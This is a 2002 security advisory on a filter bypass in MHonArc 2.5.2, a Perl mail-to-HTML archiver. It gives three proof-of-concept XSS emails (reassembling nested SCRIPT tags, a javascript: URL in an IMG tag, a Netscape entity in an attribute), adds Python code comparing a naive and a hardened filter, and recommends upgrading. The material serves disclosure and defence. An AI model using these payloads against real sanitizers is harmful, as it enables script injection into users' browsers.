19th Apr 2002 [SBWID-5291]
COMMAND
MHonArc script filtering bypass vulnerability
SYSTEMS AFFECTED
MHonArc v2.5.2
PROBLEM
Hiromitsu Takagi reported the following about MHonArc, a Perl mail-to-HTML
converter. MHonArc provides HTML mail archiving with index, mail thread
linking, etc., plus other capabilities including support for MIME and
powerful user customization features (according to their website
[http://www.mhonarc.org/]).
MHonArc has a feature which filters out scripting tags from incoming
HTML mails, and it is enabled by default. However, some variants of
scripting tags and attributes are not filtered, as the three messages
below show: script tags that reassemble after a single removal pass,
a javascript: URL in an attribute value, and a Netscape 4.x JavaScript
entity (&{...};) in an attribute value.
Exploit 1:
----------
From: [email protected]
To: [email protected]
Date: Sun, 16 Dec 2001 00:00:00 +0900
Subject: test
MIME-Version: 1.0
Content-Type: text/html
<HTML>
<SCR<SCRIPT></SCRIPT>IPT>alert(document.domain)</SCR<SCRIPT></SCRIPT>IPT>
</HTML>
----------
Exploit 2:
----------
From: [email protected]
To: [email protected]
Date: Sun, 16 Dec 2001 00:00:00 +0900
Subject: test
MIME-Version: 1.0
Content-Type: text/html
<HTML>
<IMG SRC=javascript:alert(document.domain)>
</HTML>
----------
Exploit 3:
----------
From: [email protected]
To: [email protected]
Date: Sun, 16 Dec 2001 00:00:00 +0900
Subject: test
MIME-Version: 1.0
Content-Type: text/html
<HTML>
<B foo=&{alert(document.domain)};>
Vulnerable only if Netscape 4.x is used to browse.</B>
</HTML>
----------
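The three bypass variants above come down to one filter weakness each: a single deletion pass, an unchecked URL scheme, and an unchecked attribute entity. The following added example (not MHonArc's code; the `naive_filter` is a hypothetical stand-in for single-pass tag stripping, and `hardened_filter` is a demonstration, not the v2.5.3 fix) shows the three constructed messages slipping past the naive filter and being neutralised by the hardened one:

```python
import re

# Constructed message bodies mirroring the three exploit messages in the advisory.
EXPLOIT_1 = ("<HTML>\n<SCR<SCRIPT></SCRIPT>IPT>alert(document.domain)"
             "</SCR<SCRIPT></SCRIPT>IPT>\n</HTML>")
EXPLOIT_2 = "<HTML>\n<IMG SRC=javascript:alert(document.domain)>\n</HTML>"
EXPLOIT_3 = ("<HTML>\n<B foo=&{alert(document.domain)};>\n"
             "Vulnerable only if Netscape 4.x is used to browse.</B>\n</HTML>")

SCRIPT_TAG = re.compile(r"</?script[^>]*>", re.IGNORECASE)
# Attribute value beginning with the javascript: scheme (whitespace tolerated).
JS_URL_ATTR = re.compile(r'(\s[a-z]+\s*=\s*["\']?)\s*javascript\s*:[^\s"\'>]*',
                         re.IGNORECASE)
# Netscape 4.x JavaScript entity inside an attribute value: &{ ... };
JS_ENTITY = re.compile(r"&\{[^}]*\};?")


def naive_filter(html: str) -> str:
    """Hypothetical single-pass filter: delete <SCRIPT>/</SCRIPT> tags once.
    Fragments around a removed tag can join up into a new tag (Exploit 1),
    and nothing looks at attribute values at all (Exploits 2 and 3)."""
    return SCRIPT_TAG.sub("", html)


def hardened_filter(html: str) -> str:
    """Demonstration filter addressing each bypass variant from the advisory."""
    # 1. Repeat tag removal until the text stops changing, so tags that
    #    reassemble from the remains of a removed tag are caught too.
    prev = None
    while prev != html:
        prev = html
        html = SCRIPT_TAG.sub("", html)
    # 2. Empty any attribute whose value carries a javascript: URL.
    html = JS_URL_ATTR.sub(r"\1", html)
    # 3. Drop JavaScript entities from attribute values.
    html = JS_ENTITY.sub("", html)
    return html


def contains_script(html: str) -> bool:
    """Post-filter check: does active-script syntax still appear in the output?"""
    return bool(re.search(r"<script|javascript\s*:|&\{", html, re.IGNORECASE))
```

A fixed-point loop and two extra patterns close these three cases, but a regex denylist stays fragile; the durable defence is an allowlist of permitted tags and attributes with every URL-valued attribute restricted to known-safe schemes.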
SOLUTION
Upgrade to MHonArc v2.5.3